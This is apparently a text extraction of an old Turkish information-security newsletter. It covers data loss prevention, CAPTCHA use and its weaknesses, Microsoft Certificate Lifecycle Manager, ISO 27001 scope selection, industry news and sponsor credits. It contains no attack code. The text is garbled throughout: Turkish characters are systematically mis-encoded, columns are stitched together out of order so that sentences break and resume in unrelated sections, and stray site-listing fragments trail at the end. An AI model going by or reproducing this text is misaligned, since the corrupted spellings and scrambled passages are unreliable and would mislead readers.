tan›mlanabilir (veriyi açabilme, de¤ifltirebilme, yazd›rabilme, da¤›tabilme, yeni yetki tan›mlayabilme gibi). DRM ile güvenlik alt›na al›nm›fl veriler baflka sistemlere transfer edilebilir. Ancak güvenli kullan›c› tan›m› nedeni ile yetkisiz kimseler bu verileri açamazlar. DRM, flifreleme ve yetkilendirme
aç›s›ndan DLP’den daha üstün bir üründür. Ancak kullan›m›
için DRM kullan›c›lar›n›n biliflim sistemlerini kullanma kabiliyetlerinin yüksek olmas› ve s›k› bir e¤itimden geçirilmeleri
gerekir. Kullan›m aç›s›ndan daha zor olan DRM, DLP’nin rakibi de¤ildir. Hatta her iki sistem entegre edilip birlikte kullan›labilir.
den geçmek istiyorum:
Finansal Dokümanlar
En s›k kullan›ld›¤› aland›r. Bütçe, nakit ak›fl›, finansal risk
analizleri ve bordro gibi hem flirketi içine hem flirket d›fl›na
s›zmas› riskli olan dokümanlar DLP korumas› alt›na al›n›r.
Kredi kart› ve benzeri bilgileri de unutmayal›m.
Müflteri Bilgileri
Müflteri listeleri, eriflim bilgileri, müflteriler ve sat›lan ürünlerin iliflkilerinin bulundu¤u tablolar, potansiyel müflteri listeleri ve müflterilere özel uygulamalar›n korunmas› özellikle
Sarbanes-Oxley gibi geliflmifl denetimlere tabi tutulan Amerikan flirketleri ve Amerikan borsalar›nda ifllem gören uluslar aras› flirketler için zorunluluktur. fiirketler gerek müflterilerini risklerden korumak, gerekse standartlara uymak için
müflteri bilgilerini DLP ile koruma alt›na al›rlar.
Kaynak Kodlar
‹ç kullan›m için ya da pazarlanmak için gelifltirilen yaz›l›mlar›n kaynak kodlar›n› korumak, ilgili projenin ve ilgili flirketin
gelece¤ini korumak anlam›na gelir. DLP, kaynak kodlar›n korunmas› ve iyi niyetle olsa bile içeri¤inin baflkalar›na gönderilmesini engellemek için iyi bir yöntemdir.
Fikir Mülkiyeti
Fikir ürünleri, telif haklar›, müflterilere özel gelifltirilen proje
dokümanlar›, üretim formülleri ve benzeri bilgiler DLP ile
korunarak ifl süreklili¤i sa¤lanabilir ve flirketin gelece¤i garanti alt›na al›nabilir. Coca-Cola’n›n formülünü merak etmeyen var m›?
Ürün Seçimi
Encryption
DLP bir flifreleme ürünü de¤ildir. PKI ve benzeri yap›larda
flifrelenmifl veriler çal›nsa bile, ilgili özel anahtara sahip olmayan kimselerce veriler görülemez. Birçok flifreleme ürünü veriyi sadece flifreler, yetkili kifli flifrelenmifl dosyay› açt›¤›nda içeri¤ini istedi¤i gibi baflkalar›na gönderebilir. Dolay›s› ile sadece flifreleme teknikleri DLP teknolojisinin yerini tutamaz.
Sistem Güvenlik Yaz›l›m›
Host IPS ve benzeri ürünler sistem güvenli¤i ile ilgilenir. Ancak sistemde hangi verilerin bulundu¤undan haberdar de¤illerdir. Dolay›s› ile hiçbir sistem güvenli¤i yaz›l›m› DLP teknolojisine muadil de¤ildir.
Kullan›m Alanlar›
Elbette DLP hizmetlerini istedi¤iniz her verinin korunmas›
için kullanabilirsiniz. S›k kullan›lan örneklerin k›saca üzerin-
Bir Data Loss Prevention ürünü seçerken atlanmamas› gereken birkaç konu bulunur. Elbette öncelikle ürünün deste¤i… Destek al›namayan hiçbir ürün katma de¤erli hizmet
sa¤layamaz. Ortam deste¤i, avuçiçi bilgisayarlar, dizüstü
bilgisayarlar, sunucular vb... Koruma kabiliyeti, dosya içinde
ekran görüntüsü al›nabilmesi, uygulama ve a¤ katmanlar›nda koruma mekanizmas›, koruncak sistemin yeri, çevrimiçi
ve çevrimd›fl› kullan›c›lar için destek ve merkezi politika yönetimi.
Sizin de fark edece¤iniz gibi yaz›m›n hiçbir bölümünde marka belirtmedim. Mevcut sisteme ve mevcut ihtiyaçlara göre
farkl› markalar daha verimli hizmetler sunabilir. Ancak en
az›ndan araflt›rma yapabilmeniz için birkaç ürünü alfabetik
s›ra ile yazmak istiyorum.
Oakley Networks, McAfee DLP, PortAuthority, Verdasys,
Vericept, Vontu.
Bilgileriniz hep sizin olsun.
Serkan AKIN
[email protected]
Murat LOSTAR
[email protected]
(Completely Automated Public Turing test to
CAPTCHA tell
Computers and Humans Apart)
Nedir, Neden Kullan›l›r
Carnegie Mellon School of Computer Science taraf›ndan gelifltirilen bir proje olan CAPTCHA’n›n amac›, bilgisayar ile insanlar›n davran›fllar›n› ay›rt etmek, istemcinin gerçekten bir
insan oldu¤unu kan›tlamakt›r. Bu ayr›m› yapman›n daha fazla gerekli oldu¤u web uygulamalar›nda çok s›k kullan›lmaya
bafllanm›flt›r.
Sistemin çal›flmas› k›saca flöyledir. Sunucu rastgele bir resim oluflturur, istemci taraf›ndaki kifliden bu resimdeki yaz›y› okuyup, ilgili alana girmesi istenir. Buradaki basit mant›k
o resimde sadece insan taraf›ndan okunabilecek, bir program taraf›ndan okunmas› zor olan bir kelime oluflturmakt›r.
OCR (optik karakter tan›ma) programlar›, düzgün bir formda yaz›lm›fl yaz›y› bir resmin içinden okuyabilirler. Bu sebeple sunucu taraf›ndan üretilen resmin içindeki yaz›n›n bir insan taraf›ndan okunabilecek fakat OCR programlar› taraf›ndan okunamayacak derecede bozulmufl olmas› gerekir. ‹tiraf etmeliyim ki, CAPTCHA ile üretilmifl fakat benim okuyamad›¤›m resimlerle de karfl›lafl›yorum. Burada uygulamalar
yaz›y› bozarken kantar›n topuzunu mu kaç›r›yor, yoksa benim zaten insan olarak alg›lanmamam m› gerekiyor, ondan
emin olamad›m.
‹flin flakas› bir yana, gerçekten de üretilen karakterlerin bazen okunamamas› veya çok geliflmifl OCR programlar› taraf›ndan bazen resimlerin okunabiliyor olmas› gibi zay›fl›klar›na ra¤men, DYPM (Did You Pass Math, “3 art› sekiz kaç
eder?” gibi sorular yönelterek otomatik yaz›l›mlar› engelleyen) veya resimler aras›ndan duygusal baz› kriterlerle seçim
yap›lmas›n› isteyen v.b. gibi alternatif yöntemlerden flu an
için daha kullan›fll› olmaya devam etmektedir.
CHA kontrollerinde, bilinen bir resme ait ‘session ID’si kullan›larak, güvenlik herhangi bir OCR yaz›l›m› kullanmadan da
afl›labilir.
Paylafl›lan sunucularda, ayn› sunucuyu kullanan di¤er bir sanal ‘host’un yarataca¤› güvenlik aç›¤›, CAPTCHA kullan›lan
siteyi de sald›r›lara aç›k hale getirebilir.
CAPTCHA resminin, istemci taraf›nda oluflturuldu¤u uygulamalarda, kullan›c› taraf›nda çal›flt›r›lacak uygulamalarla resmin içine gizlenen metin, aç›k olarak görüntülenerek okunabilir. Baz› CAPTCHA sistemleri bunu önlemek için MD5 flifrelemesini kullanmas›na ra¤men bu flifrelemeler de art›k s›kl›kla k›r›labilmektedir.
Uygulama
.NET ile uygulama gelifltirenler için basit bir CAPTCHA kontrolü önerebilirim. Jeff Atwood taraf›ndan gelifltirilen bu
kontrol ile web uygulamalar›n›za befl dakika içerisinde bir
CAPTCHA kontrolü ekleyebilirsiniz. Hem ASP.NET 1.1, hem
de ASP.NET 2.0 için kaynak kodlar› mevcut olan bu kontrolü ihtiyaçlar›n›za özel esnekliklerle kullanman›z mümkün.
• Resim dinamik olarak üretilip, bellekten direkt olarak taray›c›ya gönderildi¤inden diskte yer kaplam›yor.
• Resmin arkaplan›, fontlar ve opsiyonel olarak çizdirilen
ekstra çizgilerin bozulma derecelerini, birbirinden ba¤›ms›z
olarak ayarlayabiliyorsunuz.
• Resmin boyutlar›n›, karakter say›s›n› ve kullan›lacak karakter setini belirleyebiliyorsunuz. (“1”, “I”, “0”, “O” gibi birbiri
ile kar›flt›r›lma ihtimali olan karakterler gibi.)
Güvenlik portal›na davet
nternet, yararlar› yan›nda teknoloji ile birlikte gelen yeni yöntemlerin de yard›m›yla ne yaz›k ki, eski suçlar›n
ifllendi¤i bir ortam olarak da günlük hayat›m›zda yer al›yor. Son zamanlarda gazetelerde ç›kan haberleri inceledi¤imizde, birtak›m f›rsatç› ve kötü niyetli kiflilerin bu konuyu
sömürme girifliminde bulunma noktas›nda harekete geçirmifl olduklar›, “‹nternet üzerinden, insanlar› aldatarak k›sa
yoldan nas›l para kazanabilirim?” sorusunun cevab›n› arad›klar›n› anl›yoruz. Bu durumun do¤al sonucu olarak bir de
büyüyen “ma¤dur” tabaka var.
I
Özellikle sanal banka ma¤durlar›, kaybettikleri paralar›n da
etkisiyle, bankalar› daha güvenli olmaya zorluyorlar. Bu güzel bir geliflme. Son olarak internet bankac›l›¤› kullan›larak
yap›lan doland›r›c›l›klar›n kurbanlar›, haklar›n› aramak, toplu
hareket ederek bu konuda bilinçlendirme sa¤lamak amac›yla bir dernek kurdular.
Bilgi ve biliflim güvenli¤i konusu, temel olarak üç kavram
üzerinde ayakta durmakt›r; Teknoloji, Süreçler ve ‹nsan.
Teknolojinin getirdi¤i problemleri yine yeni teknolojilerin
çözmesi, bizlerin al›fl›k oldu¤u teknolojik yöntemlerle sa¤lan›yor. Kap›lardaki kilitlerden, antivirüs yaz›l›mlar›na, flifreleme yöntemlerinden kimlik yönetimine kadar bir çok teknolojik çözüm, bize yard›mc› oluyor. Bilgi güvenli¤ini sa¤larken,
teknolojiye tan›ml› yap›lar›n da yard›mc› olmas›
gerekiyor. Bu yap›lar› k›saca ‘süreçler’ bafll›¤›
ile tan›ml›yoruz. Politikalar (güvenlik politikas›, internet kullan›m politikas›, parola politikas› vb.), prosedürler (parola de¤ifltirme
prosedürü, ziyaretçi prosedürü, sistem odas›na cihaz sokma prosedürü), ve benzeri tüm dokümantasyon, yap›lan ifllerin düzenlenmesine ve
güvenli¤in sa¤lanmas›na yard›mc› oluyor.
Ancak son kullan›c›lara da düflen görevler var. Bu-
nun bafl›nda kullan›c›lar›n almas› gereken güvenlik önlemlerini bilmek ve uygulamak geliyor. Evimizi, arabam›z›, cüzdan›m›z› korurken uygulad›¤›m›z yöntemlerin benzerlerini bilgisayar›m›zdaki kimli¤imiz, bilgilerimiz ve param›z için de
uygulamam›z gerekiyor.
Peki teknoloji ile birlikte gelen riskler neler? Bu risklere kafl› uygulanmas› gereken önlemler nedir? Bu soruyu biliflim
ve bilgi güvenli¤i uzmanlar› yo¤un bir flekilde tart›fl›yorlar.
Ancak son kullan›c›lara yönelik bilgilerin bir araya topland›¤› Türkçe kaynak bulmak bu zamana kadar çok zordu. Bu eksikli¤i tamamlamak amac›yla, kar amac› gütmeyen, sponsorlar› sayesinde yayg›nlaflan bir portal hayata geçiyor:
www.guvenlik.info. Bu portalda SPAM mesajlardan internet
bankac›l›¤›na, parolalardan “‹nternet ve Çocuklar›m›z”a kadar bir çok konu ele al›n›yor.
Bu yaz›y› okuyan hemen herkesin, bilgi güvenli¤i konusunda
birikimi oldukça yüksek… Ya ifliniz bilgi güvenli¤i, ya da korunmas› gereken önemli bilgilere sahipsiniz. Her durumda
sadece teknolojiden ve süreçlerden de¤il, insanlardan da
yard›m almal›s›n›z.
Konuya katk›s› olabilecek tüm uzmanlardan, son kullan›c›lara yönelik basit anlat›mla ele ald›klar› k›sa ipuçlar›, makaleleri, yöntemleri ve rastlad›klar› yeni parola avc›l›¤› (Phishing) mesajlar›n› bekliyoruz. Konu ne olursa olsun,
internet kullan›m›, kredi kartlar›, SPAM, çocuklar›m›z, zararl› içerikler vs. güvenlik ile ilgili
her konu, bu yap› içinde yer alacakt›r. Son
kullan›c›lar›n anlayaca¤› dilde olmas› çok
önemli. Ayr›ca, mümkün oldu¤unca grafik ve
flekillerle desteklenmesi, ilgiyi art›racakt›r.
Amac›m›z, Türkçe konuflan internet kullan›c›lar›na, bilgi güvenli¤i konusunda daha da katk›da bulunmak.
Güvenli günler.
Nerelerde Kullanabilirsiniz?
Online Anketler, Üyelik formlar›, E-Posta Servisleri, Site içi
Arama Sayfalar›, Arama Motorlar› taraf›ndan indekslenmesini istemedi¤iniz sayfalar›n›zda, Veya istemcinin bir robot
olmas›n› istemeyece¤iniz tüm uygulamalarda...
Kontrolle ilgili kaynak kodlar› ve kurulumla ilgili bilgiyi
http://www.codeproject.com/aspnet/CaptchaControl.asp
adresinden edinebilirsiniz.
Güvenli Olmayan Uygulamalar
Kaynaklar:
CAPTCHA uygulamalar›nda, gözden kaç›r›labilen iki güvenlik sorunundan bahsetmekte fayda var.
Resmin ‘session ID’ referans al›narak üretildi¤i baz› CAPT-
http://en.wikipedia.org/wiki/Captcha
http://www.codeproject.com/aspnet/CaptchaControl.asp
http://www.captcha.net
Umut AYDIN
[email protected]
Microsoft Certificate Lifecycle
Manager’›n Getirdikleri
retilen bilgilerin korunmas›, y›llarca biliflim sektörünün geliflmesine paralel olarak ilerleyen en yo¤un
çal›flmalar›n bafl›nda gelmifltir. Güvenlik teknolojilerindeki geliflmelerde bu do¤rultuda yerinde saymam›flt›r tabiat›yla. ‹lk zamanlar›nda bilgisayar›n tüm fifllerini çekmenin
veya güvenli bir kasa içerisinde tutman›n veri gizlili¤i için en
temel ve güvenli yöntem oldu¤una inananlar, y›llar sonra a¤
teknolojileri, iflletme uygulamalar› ve internetin geliflimiyle
birlikte üretilen verinin güvenli bir biçimde paylaflt›r›lmas›
ihtiyac›yla karfl›laflt›klar›nda art›k firewall’lar üzerinde aç›l›p
kapanan portlar›n, dosyalara konulan parolalar›n dahi yeterli olmad›¤›n› gördüler.
Ü
Günümüz bilgi güvenli¤i sektörünün en çok yükselen trendlerinin bafl›nda “Güvenli Kullan›c› Tan›mlama” modelleri gelmekte. “Çok faktörlü kimlik do¤rulama” (multifactor authentication) terimi de yak›n bir geçmiflten beri, gerek ifl yaflam›m›z da, gerekse gündelik hayatta kulland›¤›m›z finansal
araçlarda (kredi kartlar›, internet flubeleri) içten içe yerini
almaya bafllad›.
Çok faktörlü kimlik tan›mlama en basit anlat›m›yla; sahip
olunan bir bilginin yan› s›ra (PIN, parola) çeflitli donan›m veya verilerin (ak›ll› kart, USB token, biyometrik veriler) birlefltirilmesi ve karfl›laflt›r›lmas› sonucunda kiflinin yetki do¤rulamas›n›n yap›lmas› ifllemi olarak tarif edilebilir. Bu yöntemin günümüzde en yayg›n kullan›lan çeflidi, “iki faktörlü
kimlik do¤rulama” (two factor authentication) olup, “bildi¤iniz bir fley ve sahip oldu¤unuz bir fley” (something you
have, something you own) mant›¤›yla çal›flmaktad›r. Piyasada ise bu konu ile ilgili en çok kullan›lan donan›mlar›n bafl›nda ak›ll› kartlar (smart card) ve USB token’lar gelmektedir.
RSA fiifreleme, sertifika depolama ve PIN do¤rulama gibi ifllemleri yapabilmelerinden ötürü, PKI (Public Key Infrastructure) uygulamalar›nda bu ürünler kullan›lmaktad›r. PKI ayr›ca ülkemizde ve dünyada çeflitli sertifika makamlar› taraf›ndan vatandafllara verilen sertifikalarla, kanun kapsam›nda
belirtilen elektronik imza sistemi uygulamalar›nda inkar
edilmezli¤i sa¤lamak maksad›yla da kullan›lmakta. ‹flletmelerde ise güvenli sistem girifli (secure logon), güvenli VPN
eriflimi, dosya flifreleme ve imzalama ifllemleri baflta olmak
üzere kifli do¤rulu¤unu kullan›c› sertifikalar›yla ispatlama
amac›yla çal›fl›r.
Daha evvel Windows Server 2003 ile birlikte gelen “Certificate Authority” (CA) servisleri ile birlikte PKI sistemi kurmay› denediyseniz ve kullan›c› say›n›z da bir hayli fazlaysa
muhtemelen kart, sertifika da¤›t›m› ve yönetimi ile ilgili eksiklikleri yaflam›fls›n›zd›r. Microsoft, 2007 y›l›n›n ilk çeyre¤inde ç›karaca¤› ve flu an Beta 2 aflamas›nda olan Certificate Lifecycle Manager (CLM) ile iflletmelerde sertifika/kart
da¤›t›m›n› kolaylaflt›r›p, yönetimi daha ölçeklenebilir hale
getirmekte.
CLM, Microsoft’un 2005 y›l›nda sat›n ald›¤› Alacris flirketine
ait olan ve finans baflta olmak üzere farkl› sektörlerde kullan›lan idNexus ürünün daha da gelifltirilmesi ve MS CA destekli hale gelmesi ile çok güçlü bir araç halini ald›.
Kullan›m Avantajlar›
CLM bulunmayan PKI çözümlerinde, özellikle sertifika flablonlar› (certificate templates) oluflturma ve yay›nlama, sertifika iste¤i onaylama ve reddetme gibi ifllemlerin tümü için
Microsoft Management Console (MMC), komut sat›r› veya
sertifika sunucusunun web arayüzü ile ayr› ayr› yap›lmakta.
CLM ile bu ifllemlerin tümü web tabanl› bir yönetim arayüzü
ile tek merkezden yap›labilir hale getirilmekte. Tüm bu özelliklerin yan› s›ra ak›ll› kartlar›n engellenmesi (block), uygulanan engellerin kald›r›lmas›, tüm yap›lan ifllemlerin raporlanmas› ve belirli bir ifl ak›fl›na sokulmas› özelliklerini de içerisinde bar›nd›r›yor. Ürün bununla birlikte birden fazla sertifika sunucusunun (CA) çal›flt›¤› ortamlar› da desteklemekte.
Ayn› flekilde birden fazla CLM ile tek bir sertifika sunucusunu yönetmek de mümkün.
Kullan›c›lar için sertifika ve kart bilgilerinin detayl› olarak
görüntülendi¤i, sertifika/kart isteklerinin yap›ld›¤› ve PIN
bilgilerinin de¤iflimine imkan sunan bir arayüzü de CLM’de
bulabilirsiniz. Böylelikle kurum içinde ilgili bilgi ifllem departman›n›n kullan›c›lardan gelen PKI bazl› istek ve sorular›na
minimum kaynakla cevap verme imkan› sa¤lan›yor.
CLM Bileflenleri
Temeli web uygulamalar› üzerine kurulan CLM kullan›m› için
iflletim sistemi olarak minimum Windows Server 2003 platformu gerekiyor. Active Directory (AD) ve sertifika servisleri (CA) ile entegre çal›flan CLM, kendi üretti¤i ve CA’de üretilen bütün konfigürasyon verilerini Microsoft SQL Server
üzerinde tutuyor.
CLM belli bafll› baz› fonksiyonel bileflenlerden olufluyor. Her
bileflen de kendi içerisinde farkl› çekirdek modülleri içeriyor.
Bu bileflenler:
• Microsoft Sertifika Makam›
• CLM sunucu taraf› bileflenleri
• Sertifika yönetici ve sahipleri
• Ak›ll› kartlar olarak s›ralanmaktad›r.
Microsoft Sertifika Makam›
CLM, sertifika sunucusu olarak; Windows Server 2003 üzerine kurulu sertifika makam› (CA) servislerini destekliyor.
CA sunucusu üzerine CLM policy ve exit policy modüllerinin
de kurulmas› gerek.
CLM Sunucu Taraf› Bileflenleri
Kurulum için Windows 2003 Server gerektiren CLM, arka tarafta Windows 2000/2003 AD yap›s›n› da desteklemekle
beraber veritaban› sunucusu olarak Microsoft SQL Server
2000 (SP3) veya 2005’e ihtiyaç duyuyor.
lan›c› uygulamas›n› da içerisinde bar›nd›r›yor.
Ak›ll› Kartlar
PKI ortam›nda CLM kullanabilmeniz için gerekli olan en son
bileflenler; Ak›ll› Kart, Cyrptographic Service Provider (CSP)
ve bir ak›ll› kart okuyucu. Beta 2 sürümü itibar›yla desteklenen ak›ll› kart middleware’leri flunlard›r:
• Axalto Ver. 5.x • AET SafeSign Standart 2.1.8 • Siemens
HiPath S›curity Card API V3.1 • Gemplus GemSafe 4.2
• Aladdin RTE 3.65
Planlama ve Kurulum ve Yeni Trendler
Web tabanl› arayüz için minimum Microsoft Internet Information Server (IIS) 6.0 ve ASP.NET uygulamas›n›n çal›flt›r›labilmesi için .NET Framework gerekiyor. CLM sunucu bileflenleri Active Directory güvenlik izinlerinin baz al›nd›¤›
“Kullan›c› Web Portal›” ve “Yönetim Web Portal›” web arayüzlerini de içerir.
Sertifika Yönetici ve Sahipleri
CLM’in taray›c› bazl› yönetim arayüzüne eriflmek için Internet Explorer 6 veya yukar› bir sürüme sahip olman›z yeterli. Secure Socket Layer/Transport Layer Security
(SSL/TLS) özellikleri ile kullan›larak, tüm yönetici ve sertifika trafi¤i sa¤lanmakta. CLM kullan›c› taraf›nda sertifika
yönetimi için herhangi bir yaz›l›m gerektirmemekle birlikte,
da¤›t›m için opsyionel olarak Internet Explorer bazl› bir kul-
Do¤ru bir PKI ortam› ve kurulum için amaç, güvenlik modelleri ve ifl süreçlerine uygun bir analiz/planlama yap›p, bu
planlama do¤rultusunda sertifika sunucunuz üzerindeki kurallar› ve flablonlar› bu planlama do¤rultusunda yapman›z
en do¤ru yol olacakt›r. Ayr›ca günümüz iflletmelerinde fiziksel ve sistem güvenli¤inin entegrasyonuna özellikle önem
verilmekte olup her zaman belirtti¤imiz gibi kurumunuzda
birden fazla bilgi adac›¤› yaratmamaya gayret göstermekle
birlikte ak›ll› kart dünyas›nda da tek kartla hem fiziksel güvenlik (girifl-ç›k›fl, pdks vb.) hem sistem güvenli¤i uygulamalar›n› çözmenizde fayda var.
Böylelikle CLM’in ak›ll› kart envanteri tutma özelli¤inden
faydalanabilir ve farkl› kartlar›n envanter ve yönetimi için
daha baflka çözümlere yat›r›m yapma gere¤i duymazs›n›z.
KISA KISA KISA KISA KISA KISA KISA KISA KISA KISA
Murat LOSTAR
[email protected]
Bilgi güvenli¤inde kapsam seçimi
ilgi Güvenli¤i Yönetim Sistemi (BGYS) kurman›n ilk
aflamas›, kapsam›n belirlenmesidir. Bilgi varl›klar›n›n
belirlenmesi, sahiplerin atanmas›, güvenlik seviyelerinin sorgulanmas›, risklerin ve mevcut durumun ortaya konmas› kapsam taraf›ndan yönlendirilir. Özellikle ISO 27001
sertifikas›n› amaçlayan bir yönetim sistemi kuruluyorsa, hangi süreçlerin, departmanlar›n, flehirlerin kapsam içine al›n›p,
hangilerinin d›flar›da b›rak›laca¤› daha da önem kazan›r.
B
Ancak burada önemli sorularla karfl› karfl›ya kal›r›z. Bilgi güvenli¤i kapsam›n› diledi¤imiz gibi seçebilir miyiz? Hangi seçim yolu izlendi¤inde daha kolay ve baflar›l› sistemler kurulabilir? Kapsam›n seçimi sadece yönetimin iste¤ine mi ba¤l›d›r? Kurumu herhangi bir yerinden dilimleyip, istedi¤imiz
gibi bir kapsam belirleyebilir miyiz?
Bu sorular›n cevab›n› önce TS/ISO 27001 standard›n› inceleyerek bulmaya çal›flal›m. Standartta yer alan, “Bu standartta, “ifl” terimi genifl anlamda kuruluflun varl›k amaçlar›n›n
temeli olan etkinlikler anlam›na gelmektedir.”(*) aç›klamas›,
kapsam›n mutlaka kuruluflun varl›k amaçlar›n›n temeli olan
etkinlikleri içermesi gerekti¤ini söylemektedir. Ayr›ca, ayn›
standard›n 4.2.1.a maddesi de “... kapsamdan herhangi bir
d›flar›da b›rakman›n ayr›nt›lar› ve aç›klamas›n› da ekleyerek,
BGYS kapsam›n› ve s›n›rlar›n› tan›mlama” zorunlulu¤unu ortaya koymaktad›r.
Kapsam yaz›l› hale getirilirken içinde yer alan süreç, önemli
varl›klar, ofisler, ba¤lant›lar, iliflkiler ve anlaflmalar tan›mlanmal›d›r. Kapsam içine alman›n ve d›fl›nda b›rakman›n nedenlerinin de yaz›l› hale getirilmesi, bu kapsamla çal›flacak tüm proje ekibinin istekleri daha iyi anlamas›na ve daha do¤ru kararlar vermesine yard›mc› olacakt›r. Ayr›ca, kapsam tan›m› ne
kadar ayr›nt›l› yap›l›rsa, kapsam içi ile kapsam d›fl› aras›ndaki
gri alanlar, ne kadar ince bir çizgi haline getirilip yaz›l› hale sokulursa, proje bafllang›c› ve baflar› olas›l›¤› o kadar artar.
Kapsam seçimi s›ras›nda kullan›labilecek bir yöntem de, flekilde görüldü¤ü gibi, bir flema (görsel kapsam) haz›rlanmas›d›r. Görsel kapsama, kapsam içindeki departman ve süreçler, bunlar›n iliflkili oldu¤u di¤er flirket içi (ama kapsam d›fl›
b›rak›lan) departman/süreçler ve son olarak flirket d›fl› kapsamla iliflkili kurumlar yerlefltirilir. Daha sonra, kapsam ile
d›fl›ndakiler aras›ndaki veri ak›fllar› oklarla belirtilir. Bu oklar›n (flekilde kal›n çizgiyle gösterilmifltir) kapsam s›n›rlar›n›
kesti¤i yerler ise, bize, anlaflman›n ya da mutabakat›n zorunlu oldu¤u noktalar› iflaret eder. Tüm bu iflaretli yerleri tan›mlayan en az bir yaz›l› doküman›n bulunmas› iliflkilerin anlafl›lmas›n› da kolaylaflt›racakt›r.
• Amerikan Ulusal Güvenlik Ajans› (National Security
Agency, NSA) sözcüsü Ken White, Microsoft Vista’n›n gelifltirme çal›flmalar›nda Microsoft’a yard›mc› olduklar›n› aç›klad›. NSA, Amerikan Savunma Bakanl›¤›nca aç›klanan gereksinimlere uygunluk sa¤lamak için bir çok flirkete ürün gelifltirme çal›flmalar›nda dan›flmanl›k sa¤l›yor.
• Cisco Systems, web ve elektronik posta güvenli¤i sektörünün önemli oyuncular›ndan IronPort flirketini 830 Milyon
Dolara sat›n ald›.
• CheckPoint, IDS/IPS ve Firewall ürünlerine sahip NFR Security flirketini 20 Milyon Dolara sat›n ald›.
• Symantec, Continuous Data Protection (CDP) üreticisi Revivio flirketini sat›n ald›. Revivio ürünleri ile üzerinde de¤ifliklik yap›lan dosyalar›n eski ve yeni sürümleri sistem taraf›ndan yedeklenebiliyor. Symantec, Revivio ürünlerini
Symantec NetBackup ürün grubuna dahil edecek.
• 1 Aral›k 2006 tarihinde US-CERT (United States-Computer
Emergency Response Team) bankalara ve finansal kurulumlara siber terörist sald›r›s› alarm› gönderdi.
• eEye, sadece S›f›r Gün (Zero-day) aç›klar›n› takip eden bir
hizmet gelifltirdi¤ini duyurdu.
• Microsoft antivirus pazar›ndan sonra güvenlik ve uyumluluk denetimi pazar›na da giriyor. Spider takma ad›yla gelifltirilen yeni Microsoft ürünü tüm biliflim sisteminin güvenlik
aç›klar›n› taray›p raporlayabiliyor.
• Türkiye’de Kas›m ve Aral›k aylar›nda binden fazla kifli MSN
hesaplar›n›n çal›nd›¤› ve kifliler listesinde bulunan tan›d›klar›ndan cep telefonu kontörü istendi¤ini bildirerek emniyet
birimlerine baflvurdu.
• Microsoft Process Monitor arac›n› duyurdu. Ücretsiz da¤›t›m› yap›lan yaz›l›m iflletim sistemi de¤iflikliklerini izleyebiliyor. Yaz›l›m› ücretsiz indirmek için http://www.microsoft.com/technet/sysinternals/processesandthreads/processmonitor.mspx
• Juniper Networks SSL-VPN ürünü grubu, Gartner raporlar›ndan sonra Forrester raporlar›nda da lider pozisyonunu
ald›.
ANA SPONSORLARIMIZ
nebula
Standart maddelerinden de anlafl›ld›¤› gibi, BGYS kapsam›n›n, tüm flirket olma zorunlulu¤u yoktur, ama flirket varl›k
amaçlar›n› içermesi gerekmektedir. Örne¤in, bir finans kuruluflu, kendi finansal ifllerinden ya da süreçlerinden sadece
bir k›sm›n› kapsam olarak tan›mlayabilir, ancak kapsam› sadece “çal›flanlar›n izin bilgilerini” olarak vermesi çok ifle yarar olmayacakt›r. Burada çal›flan izinleri kurumun varl›k
amaçlar› içinde yer almamaktad›r. Oysa bir holdingin insan
kaynaklar› firmas› için izin bilgileri en kritik bilgiler aras›nda
yer alabilir ve kapsam olarak seçilebilir.
Kapsam seçerken, kurum için kritik bir bilgi/bilgi grubu seçilebilece¤i gibi, bir ya da birden fazla ifl süreci ya da bir departmandaki tüm süreçler kullan›labilir. BGYS kurulmas› genellikle süreçler üzerinden devam etti¤inden, kapsam›n süreçlere ba¤l› olarak seçilmesi çok daha yararl›d›r. Kurumun
BGYS kapsam›n›n, bilgi güvenli¤i aç›s›ndan en geliflmifl süreçlerinden/departmanlar›ndan bafllamas› da bir baflka
avantajd›r. Böylece BGYS kurma çal›flmalar› s›ras›nda güvenlik seviyesinden çok, sistem kurmaya a¤›rl›k vermek
mümkün olacakt›r.
• NSS’in yeni nesil gelifltirilmifl Multi-Gigabit Network IPS
testlerinin ilk turu tamamland›. 13 Ürünün kat›ld›¤› ilk turda
sadece McAfee IntruShield 4010 serisi testlerden geçebildi.
www.nebulabilisim.com.tr
www.microsoft.com/turkiye
KATILIMCI SPONSORLARIMIZ
Kapsam belirlemek kadar önemli olan bir di¤er konu, bilgi
güvenli¤i yönetim sistemini kurmaya bafllad›ktan sonra ilk
döngü tamamlanana kadar kapsam› de¤ifltirmemektir. Kapsam, beraberinde hemen tüm BGYS süreçlerini, varl›klar›n›,
iliflkilerini ve anlaflmalar›n› tan›mlar. Bu yüzden kapsam›n
de¤iflmesi, tüm bu iliflkilerin yeniden de¤erlendirilmesini gerektirir.
Güvenli günler!
(*)TS ISO/EIC 27001:2005 Madde 1.1
INTERNET SPONSORU
Beyaz fiapka’ya katk›lar›ndan dolay› tüm sponsorlar›m›za ve yazarlar›m›za teflekkür ederiz.
Yay›nlanan yaz›lar›n tüm sorumlulu¤u yazarlar›na aittir.
Lütfen her konuda fikrinizi yaz›n.
www.beyazsapka.org [email protected]
‹LAN

ABONE SiSTEMiMiZ DE⁄ifiiYOR

Transkript

Benzer belgeler

ButylSeal (TDS)

kapak.fh11

Bio-Graffiti Protection.fh11

T-KIT 3 DOC*

AÇ - ekolojikmim.com